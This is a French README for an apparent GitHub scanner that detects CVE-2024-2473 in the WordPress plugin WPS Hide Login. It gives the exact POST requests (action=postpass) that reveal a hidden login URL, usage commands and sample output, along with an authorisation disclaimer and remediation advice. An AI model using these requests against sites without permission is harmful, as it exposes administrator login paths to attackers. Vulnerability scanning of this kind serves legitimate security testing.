
Divulgation de la page de connexion masquée WordPress. Détecter la divulgation de la page de connexion sur les sites WordPress utilisant WPS Hide Login ≤ 1.9.15.2 (CVE-2024-2473)
Un scanner Python professionnel pour détecter la divulgation de la page de connexion sur les sites WordPress exécutant WPS Hide Login ≤ 1.9.15.2
Codé par Venexy
WPS Hide Login est un plugin WordPress populaire qui permet aux administrateurs de remplacer l'URL par défaut /wp-login.php par un chemin personnalisé et masqué — une sécurité par l'obscurité.
Ce scanner détecte la CVE-2024-2473, une vulnérabilité où le paramètre action=postpass peut être fourni pour contourner entièrement le mécanisme de protection du plugin, exposant l'URL de la page de connexion masquée aux attaquants non authentifiés.
Le plugin WPS Hide Login déplace la page de connexion WordPress de l'URL par défaut /wp-login.php vers une URL personnalisée choisie par l'administrateur. Cependant, dans toutes les versions jusqu'à la 1.9.15.2 incluse, fournir le paramètre de requête action=postpass à /wp-login.php ou /wp-admin/ contourne cette protection, révélant l'URL d'action réelle du formulaire de connexion masqué — exposant ainsi le chemin de connexion secret à tout attaquant non authentifié.
Le scanner reproduit le déroulement de l'attaque de la vulnérabilité en trois phases :
Phase 1 ─► Confirm target is a WordPress installation
│
▼
Phase 2a ─► POST /wp-login.php?action=postpass
with body: action=lostpassword&post_password=test
Check: HTTP 200 + lostpasswordform present + no wp-login.php in body
Extract hidden login URL from form action attribute
│
Phase 2b ─► POST /wp-admin/?action=postpass
Check: HTTP 302 redirect to location containing reauth=1 or /login
│
▼
Report hidden login URL if discovered
Si la phase 2a ou la phase 2b correspond, la cible est signalée comme vulnérable.
requests1. Clonez le dépôt
git clone https://github.com/m4xsec/CVE-2024-2473.git
cd CVE-2024-2473
2. Installez les dépendances
pip install requests
Remarque : Sur les systèmes utilisant des environnements virtuels Python ou Kali Linux, vous pouvez avoir besoin de :
pip install requests --break-system-packages
python CVE-2024-2473.py -u <TARGET_URL> [-t TIMEOUT]
| Argument | Description | Défaut |
|---|---|---|
-u, --url |
# Analyse de base
python CVE-2024-2473.py -u https://example.com
# Analyse avec un délai d'expiration personnalisé
python CVE-2024-2473.py -u https://example.com --timeout 15
# Analyse via HTTP
python CVE-2024-2473.py -u http://192.168.1.100
...
┌─────────────────────────────────────────────────────────────┐
│ CVE-2024-2473 • WPS Hide Login Page Identifier │
│ Coded by Venexy | https://github.com/m4xsec │
└─────────────────────────────────────────────────────────────┘
===============================================================
TARGET https://example.com
TIME 2024-11-01 18:00:00
TIMEOUT 10s
===============================================================
[18:00:00] [*] Phase 1 | Fingerprinting WordPress installation ...
[18:00:01] [+] WordPress confirmed — https://example.com
[18:00:01] [*] Phase 2 | Testing CVE-2024-2473 bypass vectors ...
[18:00:01] [*] Vector A | POST /wp-login.php?action=postpass
+- Status : 200 Result : MATCH
[18:00:02] [*] Vector B | POST /wp-admin/?action=postpass
+- Status : 302 Result : MATCH
###############################################################
## VULNERABILITY CONFIRMED -- CVE-2024-2473 ##
###############################################################
Plugin WPS Hide Login <= 1.9.15.2
Severity Medium (CVSS 5.3 / EPSS 93rd percentile)
CWE CWE-200 — Exposure of Sensitive Information
CVSS Vector AV:N / AC:L / PR:N / UI:N / S:U / C:L / I:N / A:N
[18:00:02] [VULN] Bypass confirmed via /wp-login.php?action=postpass
====================================================
HIDDEN LOGIN URL DISCOVERED
====================================================
>> https://example.com/my-secret-admin-path/
====================================================
Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives.
L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Obtenez toujours une autorisation écrite explicite du propriétaire du système cible avant d'effectuer toute évaluation de sécurité. L'analyse ou l'exploitation non autorisée de systèmes est illégale et contraire à l'éthique.
Utilisez-le de manière responsable.
Codé avec ❤️ par Venexy
Si cet outil vous a été utile, pensez à laisser une ⭐🌟🌟🌟 au dépôt.
| Champ | Détails |
|---|
| ID CVE | CVE-2024-2473 |
| Produit affecté | Plugin WPS Hide Login ≤ 1.9.15.2 pour WordPress |
| Sévérité | Moyenne |
| Score CVSS | 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |
| CWE | CWE-200 — Exposition d'informations sensibles |
| Score EPSS | 0.10433 (93e percentile) |
| Authentification requise | Aucune |
| Éditeur | WPServeur |
| Remédiation | Mettre à jour le plugin vers une version > 1.9.15.2 |
| URL de base WordPress cible (requis) |
| — |
-t, --timeout | Délai d'expiration de la requête HTTP en secondes | 10 |
| Ressource | Lien |
|---|
| NVD — CVE-2024-2473 | https://nvd.nist.gov/vuln/detail/CVE-2024-2473 |
| Avis Wordfence | https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wps-hide-login/wps-hide-login-19152-login-page-disclosure |
| Plugin WPS Hide Login | https://wordpress.org/plugins/wps-hide-login/ |
| CWE-200 | https://cwe.mitre.org/data/definitions/200.html |
| Calculateur CVSS 3.1 | https://www.first.org/cvss/calculator/3.1 |